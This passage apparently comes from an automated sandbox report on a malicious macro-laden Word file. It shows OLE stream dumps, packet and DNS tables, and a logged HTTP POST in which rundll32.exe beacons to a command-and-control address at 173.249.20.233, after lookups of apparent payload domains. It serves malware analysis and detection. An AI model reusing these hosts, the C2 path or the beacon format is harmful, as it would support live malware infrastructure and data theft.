                                                                                                                              Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                              Stream Path: Macros/UserForm5/o, File Type: empty, Stream Size: 0
                                                                                                                              General
                                                                                                                              Stream Path:Macros/UserForm5/o
                                                                                                                              File Type:empty
                                                                                                                              Stream Size:0
                                                                                                                              Entropy:0.0
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:
                                                                                                                              Data Raw:
                                                                                                                              Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5949
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/_VBA_PROJECT
                                                                                                                              File Type:data
                                                                                                                              Stream Size:5949
                                                                                                                              Entropy:5.26993168344
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
                                                                                                                              Data Raw:cc 61 a3 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 06 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                                                                                                                              Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1039
                                                                                                                              General
                                                                                                                              Stream Path:Macros/VBA/dir
                                                                                                                              File Type:data
                                                                                                                              Stream Size:1039
                                                                                                                              Entropy:6.60831708882
                                                                                                                              Base64 Encoded:True
                                                                                                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . _ _ Q . 0 . . @ . . . . . = . . . . . ` . . . . . . . . . . . . a . . . . J . < . . . . . r s t d . o l e > . 2 s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . . N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . d . m . . A . ! O f f i c .
                                                                                                                              Data Raw:01 0b b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 84 5f 5f 51 00 30 00 00 40 02 14 06 02 14 3d ad 02 14 07 02 60 01 14 08 06 12 09 02 12 80 99 86 d0 61 07 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 32 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30 30 32 30 b0 34 33 30 2d 00
                                                                                                                              Stream Path: WordDocument, File Type: data, Stream Size: 43108
                                                                                                                              General
                                                                                                                              Stream Path:WordDocument
                                                                                                                              File Type:data
                                                                                                                              Stream Size:43108
                                                                                                                              Entropy:3.69797214633
                                                                                                                              Base64 Encoded:False
                                                                                                                              Data ASCII:. . . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p a ! \\ p a ! \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . . . . . . 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                              Data Raw:ec a5 c1 00 5b e0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 8c a3 00 00 0e 00 62 6a 62 6a 12 0b 12 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 04 16 00 2e a8 00 00 70 61 21 5c 70 61 21 5c 8c 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

                                                                                                                              Network Behavior

                                                                                                                              Snort IDS Alerts

                                                                                                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                              02/01/21-23:18:24.263263TCP1201ATTACK-RESPONSES 403 Forbidden804916970.32.23.44192.168.2.22

                                                                                                                              Network Port Distribution

                                                                                                                              TCP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Feb 1, 2021 23:25:15.806587934 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.843477964 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.843609095 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.867645025 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.905683994 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906677008 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906698942 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906718016 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.906827927 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.912910938 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:15.950129032 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.977408886 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.050429106 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.519890070 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.519928932 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.519994020 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520045996 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520076036 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520131111 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520162106 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520207882 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520266056 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520273924 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.520302057 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.520325899 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.520396948 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.555680990 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555725098 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555757046 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555811882 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555843115 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555895090 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555923939 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.555928946 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.555954933 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556022882 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556052923 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556056976 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556062937 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556098938 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556129932 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556180000 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556206942 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556235075 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556243896 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.556257010 CET44349742194.209.195.106192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.556524992 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.605983019 CET49742443192.168.2.4194.209.195.106
                                                                                                                              Feb 1, 2021 23:25:16.912554979 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.065234900 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.065489054 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.065936089 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.218677998 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.220899105 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.220958948 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.221002102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.221103907 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.233995914 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.386765003 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.388068914 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.394598961 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.547605991 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592668056 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592698097 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592715025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592751980 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592784882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592812061 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592839956 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592868090 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592899084 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.592926025 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.593077898 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.593157053 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.745815992 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745874882 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745932102 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.745985985 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746015072 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746037006 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746067047 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746088982 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746139050 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746156931 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746190071 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746238947 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746248007 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746289015 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746337891 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746356010 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746387959 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746438026 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746486902 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746491909 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746539116 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746562958 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746591091 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746644974 CET4434974435.208.182.43192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.746651888 CET49744443192.168.2.435.208.182.43
                                                                                                                              Feb 1, 2021 23:25:17.746696949 CET4434974435.208.182.43192.168.2.4

                                                                                                                              UDP Packets

                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Feb 1, 2021 23:24:58.880695105 CET5802853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:24:58.928853989 CET53580288.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:00.078610897 CET5309753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:00.135023117 CET53530978.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:01.324814081 CET4925753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:01.372632980 CET53492578.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:02.746282101 CET6238953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:02.797038078 CET53623898.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:04.148582935 CET4991053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:04.200645924 CET53499108.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:04.974355936 CET5585453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:05.045759916 CET53558548.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:05.620496988 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:05.689152002 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:06.620959997 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:06.678680897 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:06.708297014 CET6315353192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:06.756216049 CET53631538.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:07.636528015 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:07.694077969 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:07.961083889 CET5299153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:08.008883953 CET53529918.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:09.209168911 CET5370053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:09.259351015 CET53537008.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:09.653359890 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:09.714550018 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:10.767510891 CET5172653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:10.823693037 CET53517268.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:11.948971987 CET5679453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:12.007550001 CET53567948.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:12.912555933 CET5653453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:12.960546017 CET53565348.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:13.668315887 CET6454953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:13.724653006 CET53645498.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:13.963905096 CET5662753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:14.015094995 CET53566278.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.228617907 CET5662153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:15.279382944 CET53566218.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:15.730209112 CET6311653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:15.794337988 CET53631168.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.395081997 CET6407853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.455329895 CET53640788.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.674420118 CET6480153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET53648018.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:16.854863882 CET6172153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET53617218.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:17.589114904 CET5125553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:17.639827013 CET53512558.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:21.696125984 CET6152253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:21.755196095 CET53615228.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:23.831988096 CET5233753192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:23.880327940 CET53523378.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:29.161744118 CET5504653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:29.224725962 CET53550468.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:43.635374069 CET4961253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:43.695733070 CET53496128.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:44.288331985 CET4928553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:44.344719887 CET53492858.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:44.961225033 CET5060153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.010988951 CET53506018.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:45.397160053 CET6087553192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.469964027 CET5644853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:45.472508907 CET53608758.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:45.556623936 CET53564488.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:46.067111015 CET5917253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:46.123389006 CET53591728.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:46.673748970 CET6242053192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:46.730539083 CET53624208.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:47.361151934 CET6057953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:47.420326948 CET53605798.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:47.830176115 CET5018353192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:47.878108978 CET53501838.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:48.203210115 CET6153153192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:48.259474993 CET53615318.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:49.472291946 CET4922853192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:49.531461000 CET53492288.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:50.022305012 CET5979453192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:50.074915886 CET53597948.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:25:59.745949030 CET5591653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:25:59.794500113 CET53559168.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:00.062516928 CET5275253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:00.121984959 CET53527528.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:02.930495024 CET6054253192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:02.991489887 CET53605428.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:33.801259041 CET6068953192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:33.850214958 CET53606898.8.8.8192.168.2.4
                                                                                                                              Feb 1, 2021 23:26:35.533540964 CET6420653192.168.2.48.8.8.8
                                                                                                                              Feb 1, 2021 23:26:35.589812994 CET53642068.8.8.8192.168.2.4

                                                                                                                              DNS Queries

                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                              Feb 1, 2021 23:25:15.730209112 CET192.168.2.48.8.8.80xd28eStandard query (0)physio-svdh.chA (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.674420118 CET192.168.2.48.8.8.80x8fb2Standard query (0)www.isatechnology.comA (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.854863882 CET192.168.2.48.8.8.80xb149Standard query (0)www.isatechnology.comA (IP address)IN (0x0001)

                                                                                                                              DNS Answers

                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                              Feb 1, 2021 23:25:15.794337988 CET8.8.8.8192.168.2.40xd28eNo error (0)physio-svdh.ch194.209.195.106A (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET8.8.8.8192.168.2.40x8fb2No error (0)www.isatechnology.comisatechnology.comCNAME (Canonical name)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.839863062 CET8.8.8.8192.168.2.40x8fb2No error (0)isatechnology.com35.208.182.43A (IP address)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET8.8.8.8192.168.2.40xb149No error (0)www.isatechnology.comisatechnology.comCNAME (Canonical name)IN (0x0001)
                                                                                                                              Feb 1, 2021 23:25:16.910959005 CET8.8.8.8192.168.2.40xb149No error (0)isatechnology.com35.208.182.43A (IP address)IN (0x0001)

                                                                                                                              HTTP Request Dependency Graph

                                                                                                                              • 173.249.20.233
                                                                                                                                • 173.249.20.233:443

                                                                                                                              HTTP Packets

                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                              0192.168.2.449775173.249.20.233443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                              Feb 1, 2021 23:26:34.798719883 CET5316OUTPOST /hzctvbal94fl2bqa/ HTTP/1.1
                                                                                                                              DNT: 0
                                                                                                                              Referer: 173.249.20.233/hzctvbal94fl2bqa/
                                                                                                                              Content-Type: multipart/form-data; boundary=------------------eWKPCakCSQtYkd9BaQ
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                              Host: 173.249.20.233:443
                                                                                                                              Content-Length: 8516
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Feb 1, 2021 23:26:35.634749889 CET5329INHTTP/1.1 200 OK
                                                                                                                              Server: nginx
                                                                                                                              Date: Mon, 01 Feb 2021 22:26:35 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Data Raw: 66 33 34 0d 0a 60 dd f8 6b f5 7b 0f 72 df 61 1b cd 10 8e 91 aa 4c ff 8b ca 73 b3 c5 42 00 7c 08 b1 eb 43 17 26 a4 3b 38 3d 07 29 68 f3 a1 26 be 06 ff 46 31 95 d0 01 17 98 86 bd 9f 52 f3 6a 83 29 fb 9c 35 06 de df 7d 24 61 95 2f b9 08 2a aa 20 59 22 15 ea 23 52 7e d4 bb ac fd 43 87 48 cc df 73 af 90 21 96 a3 7d 56 31 8e 27 be 2a 85 a8 52 60 dd f6 4d 4e 5d e7 e6 39 a0 40 bc 4d 93 a4 e2 2b 05 06 a4 9d d5 45 65 d4 e0 e0 4b e1 c2 ea 76 a9 33 10 82 70 4c 88 27 9c d2 5b 6f 4d 2b 71 47 0b 62 d0 63 b3 9c be b3 25 be fa b7 55 42 d1 2e 42 1a d1 11 f9 96 25 82 36 ab 2e 2a 41 1d 0c 85 b6 67 a0 f2 15 21 5b 21 4a 61 df 46 91 b0 1f e4 78 2c 07 61 62 3b df 54 d4 b6 07 25 38 02 a8 04 55 79 08 f9 28 a9 33 f5 88 89 11 74 58 fa 84 29 e3 c4 88 15 85 cc 7d 86 bc 16 7b fc f5 10 0a 52 b7 68 23 29 40 e3 81 ce 9a d5 51 5e 44 ab 56 a5 f6 51 44 88 5b ce e5 2c 91 6e 73 34 c6 b8 ea 50 82 13 8b c1 f2 48 17 93 4a ea f9 08 53 a3 3a a7 c0 57 ef d0 c0 bf f2 9c 71 12 6d ee 10 3a 0a 05 6e 82 6e 22 9d 5c 72 c2 b7 10 47 ef 13 7a f1 b8 c6 b7 de 7b 9c fb be b9 70 4b 82 04 54 e3 6c 12 b4 7c 9b cf c1 22 6e f5 e1 16 b9 47 d0 67 e7 fc d2 7c 8d 43 08 5c fb 5d 1a 16 3b 07 dc 55 60 5c aa 96 cd 8b 01 d2 e0 f7 86 8f e3 61 0a 56 38 24 e9 19 45 f0 3d 52 b4 fe 04 9a b1 86 3b 0b b0 4f 15 09 ae 5b 9a 04 a6 17 92 96 73 f7 d4 86 82 fe 11 60 c8 15 81 a4 cf 75 7f 7a 89 f1 6f 2d f1 f3 aa d2 07 25 6e c3 da 5c 62 94 08 1e a8 c4 eb 9f fd 77 00 2c cf f0 06 14 14 6a 68 d7 37 89 b5 2a bc eb 36 ae fb 9d fb 13 7e c5 f7 b2 79 a8 d4 1b 15 a9 9c ed 4d 39 6d a4 a2 37 bd f9 68 43 d0 7f ca fa 69 cf 6a df 39 3d be ef 9e 99 af a3 4e 75 ee f9 f0 99 d3 f9 1d 34 72 fb ea 0e e0 41 30 05 b4 f3 b5 59 1d 35 bb 34 b3 58 36 08 62 74 32 71 72 3e 97 c0 23 8d 66 04 29 09 08 56 4a a2 e2 91 16 bb 98 4a 1d 4b 95 2a 37 a5 8f ec 0d 6d ed 7a 5c c5 16 33 44 7d 26 c1 da da 9f 67 44 a6 36 7e e8 12 c9 40 05 5d 8b 8c 83 00 de bd 4f da 2a 67 3d 48 23 91 d0 cf 77 a8 a1 47 c1 9e 52 ab 54 6a 2d ce 9b b3 15 15 a7 0d 62 d4 74 08 50 6b 5d dc ab b8 c2 75 26 1f fb fd eb d3 c7 d0 6c dd ab b4 75 f1 a8 3c 59 47 5f c5 25 e4 da 5d f3 b3 b6 3f 30 01 df b4 cb af 3d 8b 0e 5f d2 b6 9d 1b 04 84 71 72 fa 35 e4 cf 84 93 6a ae 88 57 47 d5 e6 be 9c 43 8f 4d 47 05 e1 1d 05 